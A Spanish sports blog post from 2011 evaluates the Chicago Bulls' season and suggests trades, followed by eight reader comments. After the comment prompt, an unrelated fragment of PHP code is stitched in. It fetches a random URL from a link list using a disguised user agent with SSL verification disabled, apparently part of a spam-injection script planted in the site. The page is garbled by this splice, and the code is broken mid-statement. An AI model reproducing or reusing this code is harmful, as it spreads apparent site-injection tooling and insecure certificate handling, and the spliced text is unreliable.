Chicago Bulls: Sobresaliente

13 de July de 2011 por TheDeerHunter

Tenían buena pinta. Así lo dictaminamos todos en verano aunque muy pocos fueron tan osados como para ponerlos a la altura de los grandes trasatlánticos de su conferencia. Se apostaba fuerte por el proyecto joven y prometedor que venía coqueteando con los grandes desde que Derrick Rose aterrizó en la plaza. Se había incluso especulado con la posibilidad de romper la banca con Wade y/o LeBron, amén de cuanto agente libre estelar apareciera disponible. Finalmente se ficha a Boozer y también a Tom Thibodeau, el gurú de los célebres sistemas defensivos de los Celtics, para el banquillo. El cuadro se completa con algunas buenas piezas, dejando Gar Forman un excelente sabor de boca por un trabajo bien hecho y una dirección clara y ambiciosa en todo lo que estuvo en su mano.

Pero si las expectativas eran elevadas los resultados en la regular las dejaron a la altura del betún. MVP para Rose en su tercer año en la liga, CoY para Thibodeau y ejecutivo del año (compartido) para Forman. Campeones sin paliativos de la regular y eso que rara fue la ocasión en la que pudieron contar con su dúo interior estelar simultáneamente sano. Desde luego nadie podría quejarse de la capacidad de acople del joven proyecto.

Podríamos poner pegas si consideráramos que el objetivo era el anillo. A pesar de esos inmejorables resultados dudo mucho que lo haya llegado a ser en algún momento. Todos estuvimos de acuerdo con la buena pinta del equipo pero también fuimos todos mucho más excépticos ante la posibilidad real de lograr el anillo. Lo cierto es que su periplo por las eliminatorias no ofreció la imagen más brillante y su derrota contra los Heat resultó decepcionante desde distintos puntos de vista. No estaban preparados para el verdadero reto pero es normal y comprensible.

Con todo, el trabajo está ahí y los mimbres los mantienen. Un año de experiencia puede significar en muchos casos la diferencia entre el éxito y el fracaso. Ejemplos hay a patadas. Por supuesto que ahora queda lo más difícil, que es concretar todo lo bueno que nos han mostrado en algo definitivo. Sólo vale el campeonato.

Lo mejor: La acaparación de logros individuales y colectivos. Además de los premiados, excelente rendimiento de Luol Deng. Proyecto serio y con personalidad para rato.

Lo peor: Extraña sensación de un MVP no merecido del todo. Puntuales decepciones en postemporada de Noah, Boozer e incluso del propio Rose. También de la rotación.

Jugando a GM

– Algo personal. Boozer no es santo de mi devoción. Me parece un excelente jugador para un equipo mediano, nunca para aspirar a lo máximo. Su salario condiciona demasiado todo y más con su rendimiento en la mano. Apostaría por el desarrollo de Gibson y trataría de cambiar a Boozer por un reserva sólido para el primero y un escolta titular de garantías. Quizás sea una locura, pero no vería con malos ojos la vuelta de Ben Gordon incluyendo a Maxiell en la jugada. Gordon siempre rindió en Chicago. Sospecho que Detroit tampoco pondría demasiadas pegas. Sería un buen momento para verificar si a Boozer únicamente le importa llenar el cazo puntualmente.

– Cartel de transferibles sin dudarlo para Korver y Brewer. Hay un posible expiring en CJ Watson. Me parecen cromos interesantes con los que poder retocar la plantilla.

– Está feo que lo diga después de su temporadón pero me parece el mejor momento para largar a un Luol Deng revalorizado.

– Hay que tener presente la renovación de Rose en el horizonte. Lógicamente saldrá por un buen pico que los Bulls no van a poder regatear.

Comenta

8 comentarios a esta entrada

  1. -=TheKing=- dice:
    #1

    Este equipo lo único que necesita es no lesionarse y que luol deng o rose las enchufen de fuera don efectividad

    En todo caso sustituir a deng por Rip Hamilton o un tirador que defienda y sea de garantias.

      Citar

  2. Txusma dice:
    #2

    Trasferibles Deng, Korver, Brewer para traer a quien? Para que vamos a traspasar al Senegalés? Encontraremos un alero que se adapte mejor al equipo? Y Korver y Brewer son especialistas que han tenido momentos importantes esta temporada.
    Yo creo que la adición de un escolta tipo Hamilton o Gordon sería la cerecita del pastel. Jason Richardson (agente libre) me parecería un fichaje tremendo pero no creo que se vaya a conformar con una Mid Level (aunque si quiere ganar podría hacerlo ya q está tan de moda esto de fichar por un equipo con posibilidades de anillo)

      Citar

  3. Esteban dice:
    #3

    no haria ningun cambio, primero por q por boozer y sus super contrato no hay jugadores q puedan aportar lo que aporta el, aunque sea una HACE-NUMEROS, esos numeros no los hace cualquiera, no puede definir partidos ni ser la estrella en po, pero esa es la mision de rose

    faltaria un escoltaquiza hamilton si renuencia a sus millones en detroit

      Citar

  4. jas dice:
    #4

    Pues yo a Gordon con el contrato que tiene no lo querria ni en pintura a parte que me parece un jugador capaz de desestabilizar un vestuario. Aunke Boozer tampoco es santo de mi devocion no lo cambio por Gordon.

      Citar

  5. Txusma dice:
    #5

    Y pq te parece un jugador capaz de desestabilizar un vestuario? Ahora mismo no me viene a la cabeza ningún problema extradeportivo y por ejemplo, no formó parte de los jugadores que plantaron a Kuester o se rieron de él durante un partido.
    Otra cosa es que las cosas no le hayan ido del todo bien en Chicago pero yo creo q sería una buena adquisición

      Citar

  6. safd dice:
    #6

    Yo lo que intentaría es un contrato por unos 8 kilos al año más o menos por Jamal Crawford. No defiende ni un bledo, pero Chicago sabe defender de sobra, y lo q necesita son jugadores que se creen su propio tiro, porq no es un equipo con tantos sitemas ofensivos y siempre tienen q tirar de las penetraciones de Rose. Para mi este seria la aportacion más importante, aunq alomejor se podria acompañar con una mid-level Deshawn Stevenson, intentando copiar la dupla de Dallas, Stevenson-Jet, solo q con Jamal y luego DeShawn dando descanso a Deng, q para mi deberia de ser intraferible. Si no se puede con Jamal, intentar conseguir a Jason Richardson o a JR Smith, pero yo prefiero a Crawford.

    Luego lo importante es intentar reforzar la pareja interior, q a mi personalmente me ha decepcionado un poco.

    Pero lo prioritario debe ser Jamal.

      Citar

  7. jas dice:
    #7

    Pues Gordon siempre me ha parecido un jugador un poco egoista, a lo mejor es una corazonada, muy poco pasador y con el ego un poco crecido. Me parece que nunca se llego a ganar el contrato que le firmo detroit y el tiempo lo ha demostrado. Puede ser que no me halla expresado bien, no se si puede llegar a desestabilizar el vestuario, pero la verdad no me parece un jugador interesante para la dinamica de los bulls.

      Citar

  8. Len Bias dice:
    #8

    Para mi tiene un equipo casi perfecto. Titular fijo de gran calidad con suplente reconocido y cumplidor detrás.
    Digo casi porque le falta el titular de gran calidad en la posición de escolta, ficharía a Jamaal Crawford (como primerísima opción) y si no a JR Smith, Jason Richardson está un poco acabado ya.
    Uno de estos dos anotadores con Ronnie Brewer y Keith Bogans de suplentes defensivos, y este equipo es casi inmejorable.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>